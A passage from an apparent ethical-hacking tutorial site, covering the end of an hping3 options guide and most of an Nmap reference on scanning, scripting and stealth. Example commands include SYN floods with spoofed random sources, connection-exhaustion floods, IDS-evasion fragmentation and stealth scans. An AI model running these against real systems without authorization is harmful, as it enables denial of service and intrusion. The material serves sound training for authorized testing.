# Command: -d [size] or --data [size] Sets payload size in bytes, padding with zeros if no data specified. Use for testing buffer handling by sending specific payload lengths, probing for buffer overflow vulnerabilities in fixed-size buffers, validating MTU-related behaviors, or ensuring packets reach minimum size requirements. # Example(s) hping3 -d 100 192.168.1.1 hping3 --data 1400 192.168.1.1 # Command: -E [filename] or --file [filename] Reads packet payload data from the specified file. Use for covert channel data exfiltration proofs-of-concept by encoding data in packets, enabling protocol fuzzing with specific malformed payloads, or delivering exploit shellcode embedded in packet data fields. # Example(s) hping3 -E payload.txt 192.168.1.1 hping3 --file data.bin 192.168.1.1 # Command: -e [signature] or --sign [signature] Appends an identifiable signature string to packet payload. Use for marking packets for later correlation when using multiple scanning tools, identifying which packets in captured traffic belong to specific test campaigns, or embedding metadata for tracking packet flows through complex network paths. # Example(s) hping3 -e “TEST123” 192.168.1.1 hping3 --sign “SCANID-456” 192.168.1.1
Output & Packet Display
# Command: -j or --dump Displays received packets in raw hexadecimal format showing all bytes. Use for forensic analysis of packet contents, manual protocol reverse engineering, identifying hidden data or covert channels in responses, or debugging exact byte-level protocol behaviors during exploit development. # Example(s) hping3 -j 192.168.1.1 hping3 --dump 192.168.1.1 # Command: -J or --print Filters packet display to show only printable ASCII characters, suppressing binary data. Use for cleaning up output when extracting text-based data from responses, making banner grabbing more readable, or quickly identifying human-readable content embedded in packet payloads. # Example(s) hping3 -J 192.168.1.1 hping3 --print 192.168.1.1 # Command: --tcpexitcode Sets program exit code to match the last received TCP flag value. Use for enabling shell scripting conditionals based on scan results, automating decision-making in scanning workflows by testing exit codes, or chaining hping3 with other tools that react based on whether ports are open (SYN-ACK) or closed (RST). # Example(s) hping3 --tcpexitcode 192.168.1.1
File Transfer & Channel Protocol
# Command: -B or --safe Enables reliable protocol with ACK-based acknowledgments and automatic retransmissions. Use for transforming hping3 into a basic file transfer tool with reliability guarantees, implementing covert channels that reliably exfiltrate data over unusual protocols, or demonstrating proof-of-concept protocol tunneling through restricted networks. # Example(s) hping3 -B 192.168.1.1 hping3 --safe 192.168.1.1 # Command: -u or --end Signals end of file transfer session and stops accepting further data. Use for cleanly terminating safe-mode transfers ensuring all data is acknowledged, preventing hanging connections after transfer completion, or triggering receiver-side processing once transmission is confirmed complete. # Example(s) hping3 -u 192.168.1.1 hping3 --end 192.168.1.1
Traceroute Mode Options
# Command: -T or --traceroute Performs network path tracing by systematically incrementing TTL with each packet. First packet has TTL 1 and expires at first router, which sends back ICMP time exceeded revealing its IP address. Second packet has TTL 2 and reaches second router before expiring. Use for mapping network topology hop-by-hop, identifying routing paths and intermediate devices, discovering network boundaries and filtering points, or tracing packet traversal through multiple routers. # Example(s) hping3 -T 192.168.1.1 hping3 --traceroute 192.168.1.1 # Command: --tr-keep-ttl Fixes TTL to repeatedly probe a single hop instead of incrementing. Use for diagnosing asymmetric routing by observing consistent behaviors at one hop, testing rate limiting or filtering at specific network points, or focusing analysis on a particular intermediate device’s responses. # Example(s) hping3 --tr-keep-ttl 192.168.1.1 # Command: --tr-stop Halts traceroute after receiving the first non-ICMP time exceeded reply (typically when reaching destination). Use for focusing traceroute on finding the path without excess probing, reducing unnecessary traffic once the target responds, or quickly determining whether a host is reachable. # Example(s) hping3 --tr-stop 192.168.1.1 # Command: --tr-no-rtt Disables round-trip time display in traceroute output, showing only hop IP addresses without timing information. Use for reducing output clutter during high-volume path recordings, simplifying parsing when only topology matters, or focusing on route enumeration without performance analysis. # Example(s) hping3 --tr-no-rtt 192.168.1.1
Target
The target specifies the host or IP address that hping3 will send packets to. It can be a domain, IPv4, IPv6, or even a broadcast/multicast address when appropriate.
All packet crafting, flags, and options operate toward this destination.
Domain Name – Uses a hostname that hping3 resolves to an IP. Useful for public or dynamically assigned hosts. Behaves the same as the resolved IP.
IPv4 Address – Targets a host directly using its IPv4 address. Avoids DNS resolution and gives precise packet delivery. Ideal for internal or static hosts.
IPv6 Address – Targets a host using an IPv6 address. Requires IPv6 networking and the -6 flag. Useful for testing IPv6 routing or firewalls.
Domain Name
Uses a hostname that hping3 resolves to an IP address.
Useful for testing public services or any system with DNS records. Behaves the same as targeting the resolved IP.
hping3 example.com -S -p 80
IPv4 Address
Targets a host directly using its IPv4 address. Avoids DNS resolution and is ideal for internal or static hosts. Provides exact, predictable packet delivery.
hping3 192.168.1.10 -S -p 80
IPv6 Address
Targets a host using an IPv6 address. Requires -6 flag to force IPv6 mode. Useful in dual‑stack or IPv6‑only networks for testing routing or firewall behavior.
hping3 -6 2001:db8::1 -S -p 80
Use Cases for Ethical Hackers:
Hping3’s ability to craft and send custom packets with precise control makes it valuable across multiple IT and security scenarios.
Network administrators use it to troubleshoot routing issues, test firewall configurations, measure latency and performance, verify Quality of Service policies, and diagnose connectivity problems.
Security teams rely on it to validate security device configurations, test defense mechanisms, verify policy enforcement, and simulate various attack patterns in controlled environments.
For ethical hackers, it’s a useful tool for reconnaissance, security testing, and identifying vulnerabilities that automated scanners often miss. The core use cases of hping3 for ethical hackers are outlined below.
Craft Custom Packets
Building custom packets gives you complete control over headers, flags, timing, and payload content. This precision is critical when standard tools can’t generate the exact traffic patterns needed for specialized testing.
Protocol Testing Test non-standard protocols like GRE, IPsec, and SCTP that automated scanners don’t support by crafting raw IP packets with specific protocol numbers.
Vulnerability Discovery Fuzz applications by sending malformed packets with invalid checksums, unusual TCP offsets, or invalid flag combinations to trigger edge cases in application logic.
Exploit Development Deliver precise payloads with specific sizes and timing to test buffer overflows, measure response timing for timing attacks, and set specific TCP sequence numbers.
Evasion Testing Bypass security controls using fragmentation, spoofed source addresses, unusual TTL values, and unexpected TCP flag combinations.
IDS/IPS Validation Test whether security monitoring detects known exploit patterns, fragmented attack traffic, spoofed addresses, and unusual protocol usage.
Stack Fingerprinting Identify remote operating systems by analyzing how different TCP/IP implementations respond to packets with specific characteristics.
# Test raw IP protocols (GRE, IPsec, SCTP) hping3 -0 -H 47 target.com # Fuzz with malformed packets using bad checksums hping3 -S -p 80 -b target.com # Deliver custom exploit payloads hping3 -S -p 80 -E payload.bin -d 5000 target.com # Test fragmentation handling hping3 -S -p 80 -d 10000 -f target.com
Probe Hosts and Ports
Manual probing provides granular control when automated scanners are too noisy or trigger security alerts. Unlike tools that follow predefined patterns, hping3 lets you craft individual probes with precise characteristics.
Stealth Scanning Control scan timing and packet construction to stay below IDS thresholds using microsecond-level timing control and unusual flag combinations.
Firewall Mapping Test how stateful firewalls respond differently to SYN packets versus ACK packets to map filtering rules without completing three-way handshakes.
Rule Enumeration Systematically test different flag combinations, ports, and protocols to build a complete picture of firewall policies.
Service Fingerprinting Discover services that respond only to specific protocols, source ports, packet flags, or payload content.
Rate Limit Bypass Space probes to stay under detection thresholds while maintaining scan progress by monitoring response patterns and adjusting timing.
Honeypot Detection Identify deception systems by analyzing response characteristics, timing patterns, and TCP/IP stack behavior.
# Stealth SYN scan with slow timing hping3 -S --scan 1-1000 -i u100000 target.com # ACK scan to map firewall stateful rules hping3 -A --scan 1-1000 target.com # NULL scan for firewall evasion hping3 --scan 1-1000 target.com # UDP service discovery hping3 -2 -p 53,123,161 target.com
Test Firewalls and IDS/IPS
Testing security devices validates whether firewalls enforce intended policies and IDS/IPS systems detect sophisticated attack patterns. Understanding device responses reveals misconfigurations and detection gaps.
Evasion Technique Testing Use fragmentation, unusual flag combinations (Xmas, NULL, FIN), and timing manipulation to test whether security devices properly inspect and reassemble traffic.
Anti-Spoofing Validation Verify that ingress and egress filtering prevents source address spoofing by sending packets with spoofed IPs from different network locations.
Deep Packet Inspection Test whether devices examine packet contents beyond headers by sending fragmented packets with payloads split across fragments.
Service Impersonation Manipulate source ports to appear as legitimate services like DNS (port 53) or HTTP (port 80) to test firewall rule configurations.
Blind Spot Identification Systematically probe with different protocols, ports, and flag combinations to find gaps in security monitoring coverage.
Validation Bypass Test inspection depth by sending packets with incorrect checksums, invalid sequence numbers, impossible flag combinations, and malformed options.
# Xmas scan to test IDS detection hping3 -F -P -U --scan 1-1000 target.com # Fragmentation to evade deep packet inspection hping3 -S -p 80 -f -c 10 target.com # Source port spoofing to impersonate DNS hping3 -S -p 80 -s 53 -k target.com # NULL scan with timing evasion hping3 --scan 1-1000 -i u50000 target.com
Traffic and Denial of Service Simulation
Simulating attack traffic in authorized environments tests system resilience, validates DDoS mitigation controls, identifies breaking points, and measures incident response effectiveness.
SYN Flood Testing Generate half-open connections by sending SYN packets without completing handshakes to exhaust server connection tables and test stateful firewall resilience.
Amplification Attack Simulation Test UDP services for reflection and amplification vulnerabilities by sending small requests with spoofed source addresses that generate large responses.
Connection Exhaustion Test connection limits by creating thousands of connections with varying source ports to identify at what point systems start rejecting new connections.
Resource Consumption Send large or fragmented packets to identify which resources (CPU, memory, bandwidth, connection tables) fail first under load.
Rate Limit Detection Gradually increase traffic rates from slow to fast while monitoring responses to find exact thresholds where systems start dropping packets or triggering defenses.
Distributed Simulation Use random source IPs to mimic multi-source DDoS attacks and test whether mitigation systems can handle distributed attack patterns.
# Gradual rate increase to find breaking points hping3 -S -p 80 --fast -c 1000 target.com hping3 -S -p 80 --faster -c 1000 target.com # SYN flood test (authorized environments only) hping3 -S -p 80 --flood --rand-source target.com # Connection exhaustion with incrementing source ports hping3 -S -p 80 -s ++1 --faster -c 10000 target.com # Large packet resource consumption test hping3 -S -p 80 -d 65000 --faster -c 1000 target.com
Hping3 is a complex tool that can be used for a variety of unique situations. I highly recommend trying out as many commands as you can, and trying to find a couple use cases to emulate using the commands from this guide.
Mastering packets enables you to understand network behavior at the deepest level, identify security gaps that automated tools miss, and test defenses with the precision.
Happy Hacking!

Nmap for Ethical Hackers: Scanning, Scripting, and Stealth (Reference Guide)

Dark Marc — Wed, 12 Nov 2025 22:28:47 GMT

Nmap (Network Mapper) is a free, open-source tool used to discover devices and services on a network.
This reference guide covers the core techniques used in professional security testing:
Scanning - Find live hosts, open ports, and running services
Scripting - Automate vulnerability checks and service enumeration
Stealth - Evade detection and bypass security controls
Use this guide to quickly find the right commands for everything from basic discovery to advanced, low-profile scanning.
Nmap Features
Nmap is like a multi-tool knife that can be used for a variety of situations you might find yourself in as an ethical hacker.
It is most commonly used during the ‘Scanning’ phase of ethical hacking, where you are probing machines on a network to determine the best path for gaining access.
Core Features:
which hosts are online
which ports and services those hosts expose
what software versions are running
what operating systems they use
Nmap Scripts:
In addition to the core features, the Nmap Scripting Engine (NSE), which provides custom extensibility for Nmap core can help you:
Identify vulnerabilities
Enumerate services & users
Detect misconfigurations
Audit cryptography & SSL/TLS
Perform brute‑force password guessing
Probe for malware/backdoors
Perform service fuzzing & protocol testing
Gather external intelligence
Create custom scripts
… and much more!
Nmap History
Originally released in 1997 by Gordon “Fyodor” Lyon, Nmap started as a small Linux tool to replace many separate port scanners.
Today, Nmap works on all major operating systems and can be used via the command line or through its graphical interface, Zenmap.
In this guide, we will focus on the command-line version, which provides the most control and flexibility, though the graphical version can be useful for easier visualization later.
⚠︎ Disclaimer: Legal Use Only
Using Nmap without proper authorization can be considered illegal hacking. Always obtain written permission and clearly understand the scope before scanning. Even non-intrusive scans can trigger alerts or accidentally disrupt services.
The writer of this guide assumes no liability for any misuse, illegal activity, or damage resulting from the information provided.
What You’ll Learn:
This guide provides a comprehensive reference for understanding and using Nmap’s commands and techniques. You’ll learn how each option works and when to apply it for effective security assessment.
In this guide you will learn:
Core Scanning & Discovery: Foundational techniques for network reconnaissance, host discovery, and service enumeration.
Advanced Scripting & Detection: Leveraging automated scripts for vulnerability detection, service analysis, and deeper network intelligence gathering.
Stealth Operations & Evasion: Methods for conducting low-profile scanning, bypassing security controls, and avoiding detection during authorized testing.
For detailed technical information, check out the free Nmap book and official docs provided by the tool creators.
Pre-Requisites
This guide assumes you’re already familiar with networking fundamentals and penetration testing basics. If you’re reading this, you should already know:
What You Need to Know
Networking basics: IP addressing, CIDR notation, TCP vs UDP, common ports, and how firewalls work.
Command line: You can navigate terminals and run commands with sudo/admin privileges on your OS of choice.
How to Install Nmap:
Installing NMAP is quick and easy, with support for all operating systems.
Linux
Nmap comes pre-installed on Kali Linux and Parrot Linux. It’s still a good idea to update and install to the latest version with the command:
sudo apt update && sudo apt install nmap
Windows
Download the installer from https://nmap.org/download.html and run it.
Run Command Prompt or PowerShell as Administrator for full functionality.
macOS
brew install nmap
Detailed Install Instructions
Visit the official Nmap website for detailed install instructions.
Download Nmap
Nmap Scan Phases:
When you run an Nmap scan, it executes a series of phases in a specific order.
Each phase builds on the results of previous phases to gather progressively deeper information about your targets.
Nmap always processes phases sequentially - it completes one phase entirely before moving to the next. You cannot change this order, but you can skip certain phases or add optional ones using command-line options.
The Scan Phases
Script Pre-Scanning (Optional): Executes NSE scripts once per entire scan, before targeting individual hosts, for network-wide or global tasks (e.g., broadcast discovery, subnet enumeration, or external queries). Runs only when such scripts are selected.
Target Enumeration (Always runs, cannot be skipped): Converts all input (hostnames, IP addresses, ranges, CIDR blocks, or files) into a flat list of individual IP addresses to process. Required for every subsequent phase. A list-only mode exists to show this list without network activity.
Host Discovery (Runs by default, can be skipped): Sends probes (ARP, ICMP echo, ICMP timestamp, TCP SYN/ACK, UDP, etc.) to determine which hosts are online. Depends on Target Enumeration for the target list. Can be skipped (treats all targets as online) or run alone (no further scanning occurs).
Reverse-DNS Resolution (Runs by default, can be skipped): Resolves hostnames for online IPs; if Host Discovery is skipped, attempts resolution for all targets regardless of status. Improves readability and reveals system purpose. Can be disabled or forced even for hosts marked down.
Port Scanning (Runs by default, can be skipped): Sends probes to specified ports on online hosts (or all targets if Host Discovery is skipped) and classifies each as open, closed, or filtered. Skipping Host Discovery does not skip port scanning; it ensures scanning runs on every target. Use discovery-only mode to skip port scanning entirely.
Service Version Detection (Optional): Probes open ports to identify running software and versions by analyzing responses against a database of over 6,500 service signatures. Depends on Port Scanning to find open ports.
OS Detection (Optional): Analyzes TCP/IP stack characteristics from port scan responses to identify OS and version, matching against a database of over 1,000 fingerprints. Requires Port Scanning for data.
Traceroute (Optional): Determines the network path to each target using optimized probe packets based on Host Discovery and Port Scanning results. Runs in parallel for efficiency.
Script Scanning (Optional): Executes NSE scripts against individual hosts and open ports for vulnerability checks, service enumeration, or advanced fingerprinting. Most scripts target open ports, so depends on Port Scanning.
Output (Always runs): Collects all results from prior phases and writes them to screen or file in the chosen format (normal, XML, JSON, grepable, etc.). Depends on completion of all active phases.
Script Post-Scanning (Optional): Runs NSE scripts after all scanning and output are complete for final reporting, aggregation, or custom processing. Rarely used unless custom scripts are written.
Nmap Syntax
NMAP commands use a semi-structured format that make it easy to swap out various functions and features. Nmap commands are made up of three parts:
Scan Type: Defines the probing method and scope for each host, like checking for open ports, identifying software versions, or detecting operating systems.
Scan Options: Additional settings that control scan behavior like speed, output format, or how much detail to show.
Target Specifications: The systems you want to scan, whether that’s a single computer, a website, or an entire network.
The syntax is flexible as long as the command starts with nmap and includes at least one target. You can place scan types, options, and targets in any order after the nmap command. The typical syntax is as follows:
nmap [ Scan Type ] [ Scan Options ]
Learning Tip: Nmap + Wireshark
When you’re learning Nmap, it can be helpful to run commands on Nmap and watch how they translate to network traffic in Wireshark.
This lets you see exactly what packets Nmap sends and how targets respond, making it easier to understand what each scan type and option actually does at the network level. Use Wireshark filters to view specific traffic:
# Wireshark Filter Cheat Sheet # Show packets coming from a specific IP ip.src == # Show packets going to a specific IP ip.dst == # Show all packets to or from a specific IP ip.addr == # Combine filters with && for more specific traffic ip.src == && ip.dst == # Filter by protocol tcp udp icmp arp # Filter by port number tcp.port == 80 udp.port == 53 # Combine protocol and IP filters tcp && ip.addr ==
Scan Type
Defines the probing method and scope for each host, specifying which ports and protocols are exercised and the depth of enumeration performed.
Use these settings to select the probing technique (e.g., SYN, UDP, version/OS detection, scripts) and control exactly what info you want to collect from every target.
Host Discovery
Determine which hosts are alive on the network before performing detailed port scanning. Nmap offers various discovery techniques including ICMP probes, TCP/UDP packet probes, ARP requests for local networks, or options to skip discovery entirely when needed.
-sn : Disable port scanning; perform host discovery probes (ICMP/TCP/ARP by default depending on privileges). Use when you only want a list of live hosts.
-Pn : Skip host discovery entirely and assume all targets are up; proceed directly to port scanning. Useful when ping probes are blocked.
-PR : Use ARP requests for discovery on local Ethernet networks; fast and reliable but only works on the same LAN.
-PE : Sends an ICMP Echo Request packet (ping) to the target host. If the host is alive and responds, it will send back an ICMP Echo Reply. This is the standard ping method that most users are familiar with. However, many firewalls and hosts are configured to block or ignore ICMP Echo Requests, which can result in false negatives where active hosts appear to be down.
-PP : Sends an ICMP Timestamp Request to the target host, which queries the remote system for its current time. If the host is active, it responds with an ICMP Timestamp Reply containing the system time. This method can be useful as an alternative when ICMP Echo Requests are blocked, since some firewalls may allow Timestamp Requests while blocking standard pings. However, Timestamp Requests are less commonly used and may also be filtered.
-PM : Sends an ICMP Address Mask Request to the target host, which was originally designed to query routers and hosts for their subnet mask information. If the host responds with an ICMP Address Mask Reply, it indicates the host is active. This is another alternative discovery method when Echo Requests are blocked. Like Timestamp Requests, Netmask Requests are relatively uncommon and may bypass some firewall configurations, though modern systems rarely respond to these queries as they’re largely obsolete.
-PS[portlist] : Send TCP SYN probes to the listed ports for discovery (default common ports if none specified); useful when ICMP is filtered.
-PA[portlist] : Send TCP ACK probes to the listed ports for discovery; useful to test stateful firewall behavior.
-PU[portlist] : Send UDP probes to the listed ports for discovery; can elicit ICMP port unreachable replies that prove a host is up.
# -sn : Disable port scanning; perform host discovery only nmap -sn 192.168.1.0/24 # -Pn : Skip host discovery, assume all targets are up nmap -Pn 192.168.1.10 # -PR : ARP ping for local network discovery nmap -PR 192.168.1.0/24 # -PE : ICMP Echo Request (standard ping) nmap -PE 192.168.1.10 # -PP : ICMP Timestamp Request nmap -PP 192.168.1.10 # -PM : ICMP Netmask Request nmap -PM 192.168.1.10 # -PS[portlist] : TCP SYN probe discovery nmap -PS80,443 192.168.1.10 # -PA[portlist] : TCP ACK probe discovery nmap -PA80,443 192.168.1.10 # -PU[portlist] : UDP probe discovery nmap -PU53,161 192.168.1.10
Privilege note: Privilege affects host discovery: privileged runs use raw packets and ARP for accurate detection, while unprivileged runs use connect-style probes, which rely on the OS to complete TCP connections and may be slower or more detectable.
Scan Techniques
Probe live hosts to find open ports and gather service and system details. Choose scan types to balance speed, stealth, and accuracy; enable detection features only when you need deeper information.
-sS: TCP SYN scan (half-open). Sends SYN packets and resets the connection immediately upon receiving a SYN-ACK. Fast, stealthy, and less likely to be logged. Requires root/admin privileges to craft raw packets.
-sT: TCP connect scan. Uses the operating system’s full TCP connection handshake (SYN, SYN-ACK, ACK). Slower and more visible in logs. Works without elevated privileges but generates more network noise.
-sU: UDP scan. Sends UDP packets to target ports. Many UDP services do not respond, so open ports often appear as “open|filtered.” Slower due to rate limiting and timeouts. Useful for discovering DNS, SNMP, or DHCP services.
-sA: TCP ACK scan. Sends ACK packets to map firewall rulesets. Helps determine whether ports are filtered (stateful firewall) or unfiltered. Does not identify open ports directly.
-sN: Null scan. Sends TCP packets with no flags set. RFC-compliant closed ports send RST; open ports don’t respond.
-sF: FIN scan. Sends TCP packets with only FIN flag set. Same behavior as Null scan.
-sX: Xmas scan. Sends TCP packets with FIN, PSH, and URG flags (lit up like a Christmas tree). Same behavior as Null and FIN scans.
-sO: IP protocol scan. Sends packets with different protocol numbers (e.g., ICMP=1, IGMP=2, GRE=47) to discover which protocols the host supports beyond TCP and UDP.
# TCP SYN scan (half-open), fast and stealthy; requires elevated privileges sudo nmap -sS 192.0.2.10 # TCP connect scan, uses OS connect call, visible in logs and does not require privileges nmap -sT scanme.nmap.org # UDP scan for DNS and SNMP; slower and often returns open|filtered sudo nmap -sU -p 53,161 192.0.2.20 # TCP ACK scan to map firewall rules and detect filtered ports nmap -sA 10.0.0.5 # Null scan (no flags) to probe TCP stack responses nmap -sN 192.168.1.20 # FIN scan to probe TCP stack responses nmap -sF 192.168.1.20 # Xmas scan (FIN+PSH+URG) to probe TCP stack responses nmap -sX 192.168.1.20 # IP protocol scan to enumerate supported IP protocols (ICMP, GRE, etc.) sudo nmap -sO 192.0.2.30
Detection
-sV : Version detection. Sends tailored probes to open ports and analyses responses against a database of over 6,500 known service signatures to identify the exact application name, version, and additional details such as protocol or configuration.
-O : OS detection. Analyses subtle differences in TCP/IP stack behaviour, such as sequence numbers, window sizes, and flag responses, to fingerprint the remote operating system, version, and sometimes device type.
-sC : Run the default safe NSE script set. Executes a curated collection of non-intrusive scripts for common enumeration tasks like banner grabbing, service discovery, and basic vulnerability checks without risk of disruption.
--script= : Run a specific NSE script or category (vuln, auth, default, safe). Allows targeted automation for vulnerability scanning, authentication testing, or deep service enumeration. Use with caution on production systems to avoid unintended impact.
--traceroute : Maps the network route from your machine to the target host, showing each hop along the path. Depends on host discovery and port scanning completing; useful for network mapping and troubleshooting.
-A : Aggressive scan shortcut. Combines OS detection, version scanning, default safe script execution, and traceroute in a single command. Provides comprehensive reconnaissance but generates significant network traffic and is easily detected.
# Version detection to identify service name, protocol, and version nmap -sV 192.0.2.10 # OS detection to fingerprint remote OS and network stack sudo nmap -O 192.0.2.10 # Run default safe NSE scripts for common enumeration and checks nmap -sC 192.0.2.10 # Run NSE scripts in the ‘vuln’ category (use with caution) nmap --script=vuln 192.0.2.10 # Run a specific NSE script by name for targeted enumeration nmap --script=http-enum 192.0.2.10 # Traceroute only, mapping the path to the target host nmap --traceroute 192.0.2.10 # Aggressive scan combining OS detection, version detection, default scripts, and traceroute sudo nmap -A 192.0.2.10
Port Specification
Choose which ports to probe on each target to control scan scope, time, and noise; port specs can be numeric, ranges, named services, or protocol-prefixed. Use targeted lists or top-port scans for speed, and full sweeps only when authorized and necessary.
-p : Specify ports as single ports, comma lists, numeric ranges, or service names.
-p- : Scan all ports (1–65535). TCP is default; use -sU to scan UDP ports.
-F : Fast scan; test the top 100 most common ports.
--top-ports : Scan the most common N ports by frequency, e.g. -top-ports 50.
--exclude-ports : Exclude specific ports from the scan when doing wide sweeps.
-p [proto]:[ports] : Protocol-prefixed port list. For example: tcp:22,80 or udp:53,161. Use -sU for UDP probes.
# -p : Single, list, range, or service names nmap -p 22 192.168.1.5 nmap -p 22,80,443 scanme.nmap.org nmap -p 1-1024 10.0.0.1 nmap -p http,https example.com # -p- : All TCP ports nmap -p- 203.0.113.5 # -F : Fast scan (top 100) nmap -F 192.0.2.10 # --top-ports : Most common N ports nmap --top-ports 50 198.51.100.10 # --exclude-ports : Exclude specific ports nmap -p- --exclude-ports 25,465 203.0.113.5 # -p [proto]:[ports] : Protocol-specific nmap -sU -p udp:53,161 203.0.113.10 nmap -p tcp:22,80 198.51.100.20 nmap -sU -p udp:53,161 -p tcp:22,80 203.0.113.10
Scan Options
Configure how probes are delivered and results are handled, including timing, retries, rate limits, stealth/evasion, verbosity, and output formats.
Use these controls to tune scan speed, reduce network impact or detectability, and determine how scan data is recorded and reported.
Output:
Control where and how Nmap saves scan results.
Nmap prints a human-friendly report to the terminal by default; output flags let you save that report and machine-readable variants to files so results can be archived, parsed, or piped into other tools.
-oN - Save normal, human-readable output to . This file mirrors the interactive terminal report but begins with the exact nmap command and a timestamp, and is intended for manual review and audit notes.
-oX - Save XML output to . Produces structured XML suitable for reliable parsing by programs and scripts; preferred when you need to transform results into reports or import into tools.
-oG - Save grepable-style output to . Emits compact, one-line-per-host records with simple delimiters that are easy to process with command-line text tools like grep, awk, and cut.
-oS - Save legacy script-style textual output to . An alternate textual format retained for compatibility with older workflows that expect this layout.
-oA - Create three files at once using : .nmap, .xml, and .gnmap. Convenient when you want both a human-readable copy and machine-friendly copies produced in a single run.
--append-output - Append new scan results to existing output files instead of overwriting them; when used, all output files specified in that Nmap run are appended to rather than clobbered (note: appending XML (-oX) often produces invalid XML that must be fixed manually).
single hyphen as filename (-) - Any output format can take a single hyphen instead of a filename to write that format to standard output and suppress the default interactive display. Use this to pipe XML or grepable output directly into other commands.
# Save normal, human-readable output to results.nmap nmap -oN results.nmap 192.0.2.10 # Save XML output to results.xml for programmatic parsing nmap -oX results.xml 192.0.2.10 # Save grepable output to results.gnmap for quick shell processing nmap -oG results.gnmap 192.0.2.10 # Save legacy script-style output to results.scripts nmap -oS results.scripts 192.0.2.10 # Produce normal, XML, and grepable outputs at once # Creates: myscan.nmap myscan.xml myscan.gnmap nmap -oA myscan 192.0.2.10 # Write XML to stdout instead of a file (useful for piping) nmap -oX - 192.0.2.10 # Include a timestamp in the filename using strftime-style tokens # Example: scan-142530-110525.xml where %T = HHMMSS and %D = MMDDYY nmap -oX “scan-%T-%D.xml” 192.0.2.10 # Append results to existing files across runs (all specified outputs) nmap --append-output -oN results.nmap 192.0.2.10 # Combine formats in one run (normal + XML + grepable) and append output nmap --append-output -oN results.nmap -oX results.xml -oG results.gnmap 192.0.2.10
Output to Database:
Nmap does not support direct database output.
Storing scan results in a database allows tracking historical data, monitoring newly opened ports, identifying vulnerable services, and querying large-scale results efficiently.
This can be done by exporting Nmap results in XML and importing them with a script in Perl or Python, converting XML to CSV for bulk loading, using the nmap-sql MySQL patch, or using tools like PBNJ, which organizes scan data in a database and highlights changes between scans.
Verbosity
Control how much information Nmap shows while scanning. Use -v to increase output detail. Repeat up to three times (-v, -vv, -vvv) to show progressively more information about scan progress, host status, and timing.
-v Shows the ports Nmap finds open and a final summary after the scan. You see which services are running on the target and whether the host is up.
-vv Shows everything from basic plus messages about what Nmap is doing at each step. For example, it tells you when it starts scanning, when each scan phase finishes, and how long certain steps take.
-vvv Shows everything from medium plus small extra details like statistics about tasks running in the background, such as how DNS lookups were performed or timing details for each phase.
nmap -v 192.168.1.1 # basic progress and host information nmap -vv 192.168.1.1 # more detailed progress and events nmap -vvv 192.168.1.1 # maximum verbosity
Diagnostic
Display additional information about scan behavior and results. Use diagnostic flags to troubleshoot scans, understand why ports appear in certain states, monitor progress, or debug unexpected results.
--reason - Show the reason each port is in its current state. Displays which probe or response caused Nmap to mark a port as open, closed, or filtered. Essential for validating results and understanding firewall behavior.
--stats-every - Print scan progress statistics every interval (e.g., 30s, 5m). Shows elapsed time, completion percentage, and estimated time remaining. Useful for long scans where you want periodic updates without full verbosity.
--packet-trace - Show every packet sent and received during the scan. Displays protocol details, flags, and data for each packet. Use this for deep troubleshooting or learning how Nmap probes work. Generates massive output; best used with limited targets.
--open - Only show open (or possibly open) ports in the output. Hides closed and filtered ports to reduce clutter when you only care about accessible services. Does not affect scanning behavior, only what is displayed.
-d / -dd - Enable debug output showing Nmap’s internal operations. Similar to verbosity but focused on technical details like timing calculations, probe decisions, and data structure contents. Use -d for basic debug or -dd for more detail.
# command format showing diagnostic options nmap --reason [target] nmap --stats-every [target] nmap --packet-trace [target] nmap --open [target] nmap -d|-dd [target] # real examples # show why each port is open/closed/filtered nmap --reason 192.168.1.1 # print progress every 30 seconds during a long scan nmap --stats-every 30s 192.168.1.0/24 # trace all packets for troubleshooting (use with single host) nmap --packet-trace -p 80,443 192.168.1.1 # only display open ports in results nmap --open 192.168.1.0/24 # enable debug output to see internal decisions nmap -d 192.168.1.1 # enable detailed debug output nmap -dd 192.168.1.1
Timing templates
Set the speed and stealth level of a scan. Nmap provides six templates from T0 (slowest, most stealthy) to T5 (fastest, most aggressive).
T0 Paranoid: 300 s between probes; sends one probe at a time; waits up to 900 s for a reply; retries slowly if no response; does not change delay, timeout, or retry behavior based on target replies
T1 Sneaky: 15 s between probes; sends very few probes at once; waits up to 300 s for a reply; retries cautiously; only makes very small adjustments to delay, timeout, or retries when probes time out or responses differ from expectations
T2 Polite: 400 ms between probes; limits how many probes are in flight; waits around 5 s for replies; moderate retry count; automatically increases or decreases delay, response timeout, and retry pacing when measured reply times are consistently slower or faster than the configured values
T3 Normal: 50 to 200 ms between probes; sends several probes concurrently; waits around 2 to 3 s for replies; moderate retries; continuously measures reply times and adjusts delay, timeout, and retry count to match the target’s observed responsiveness
T4 Aggressive: 10 to 500 ms between probes; sends many probes concurrently; waits around 1 to 1.25 s for replies; fewer retries; alters delay, timeout, or retries within narrow limits if the target is noticeably slower or faster while prioritizing scan speed
T5 Insane: under 5 ms between probes; sends nearly all probes at once; uses a short fixed response timeout of 0.1 to 0.5 s; minimal retries; does not adjust delay, timeout, or retry settings based on target replies
# General command format showing timing template nmap -T[T0-T5] [target] # Real examples nmap -T0 192.168.1.1 # very slow, stealthy scan nmap -T2 192.168.1.1 # polite scan to reduce network load nmap -T3 192.168.1.1 # default scan speed nmap -T4 192.168.1.1 # faster scan, standard aggressiveness nmap -T5 192.168.1.1 # fastest scan, more likely to be detected
Higher speeds may trigger intrusion prevention or cause network strain. Lower speeds are stealthier but take longer.
Performance
Control scan speed, retry behavior, and resource limits.
Use performance options to balance scan thoroughness against time constraints, network load, and target responsiveness.
Adjust these when default behavior is too slow, too aggressive, or when targets have unusual timeout characteristics.
--min-rate - Send at least packets per second. Forces Nmap to maintain minimum scan speed regardless of target responsiveness. Use when scan time is more important than stealth or network courtesy.
--max-rate - Send no more than packets per second. Caps maximum scan speed to avoid overwhelming targets or networks. Use to reduce network load or stay below rate-limiting thresholds.
--max-retries - Limit probe retransmissions to attempts. Reduces time spent on unresponsive hosts or ports. Lower values speed up scans but may miss slower targets; higher values are more thorough but slower.
--host-timeout - Give up on hosts that take longer than to scan. Prevents extremely slow hosts from delaying entire scans. Use when scanning large networks where some hosts may be rate-limited or heavily filtered.
--scan-delay - Wait at least between probes to the same host. Useful when targets rate-limit or when you need to slow down for stealth without using full timing templates.
--max-scan-delay - Cap the maximum delay between probes at . Prevents Nmap from slowing down too much when it detects rate limiting. Balances responsiveness against target behavior.
